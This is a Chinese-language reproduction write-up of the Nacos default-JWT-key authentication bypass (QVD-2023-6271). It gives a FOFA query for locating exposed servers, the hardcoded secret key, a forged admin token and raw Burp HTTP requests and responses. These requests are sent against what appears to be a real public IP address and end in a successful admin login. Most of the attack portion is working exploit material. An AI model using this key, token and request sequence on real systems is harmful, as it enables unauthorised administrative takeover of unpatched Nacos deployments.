QVD-2023-6271—Nacos身份绕过漏洞

漏洞原理

开源服务管理平台nacos在默认配置下未对token.secret.key进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。

本次复现版本为2.1.0

受影响版本

0.1.0<=nacos<=2.2.0

FOFA语句

app='nacos'

漏洞复现

图片

在nacos中，token.secret.key值是固定的，

key=SecretKey012345678901234567890123456789012345678901234567890123456789

利用该默认key可进行jwt构造，直接进入后台，构造方法：在https://jwt.io/中：输入默认key：

{'sub': 'nacos','exp': 1682908266}

图片

图片

复制上面得到的值

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Q

任意账号密码、账号提交，burp抓包后构造

admin  123456

图片

图片

POST /nacos/v1/auth/users/login HTTP/1.1Host: 139.196.217.155User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 30Origin: http://139.196.217.155Connection: closeReferer: http://139.196.217.155/nacos/Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Qusername=admin&password=123456

此时得到了token

HTTP/1.1 200 Server: nginx/1.14.1Date: Thu, 15 Jun 2023 09:45:29 GMTContent-Type: application/json;charset=UTF-8Connection: closeVary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersAccess-Control-Allow-Origin: http://139.196.217.155Access-Control-Allow-Credentials: trueContent-Security-Policy: script-src 'self'Set-Cookie: JSESSIONID=594323A71DA9845542A25B88465B4D4D; Path=/nacos; HttpOnlyAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_QContent-Length: 197{'accessToken':'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Q','tokenTtl':18000,'globalAdmin':true,'username':'nacos'}

将上面获取到的cookie填入数据包中，然后burp抓返回包

图片

右击选择Do intercept–>Response to request，点击Forward，发现报500错

图片

找到之前的构造cookie的返回包，复制并粘贴，放包

图片

登录成功

图片

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。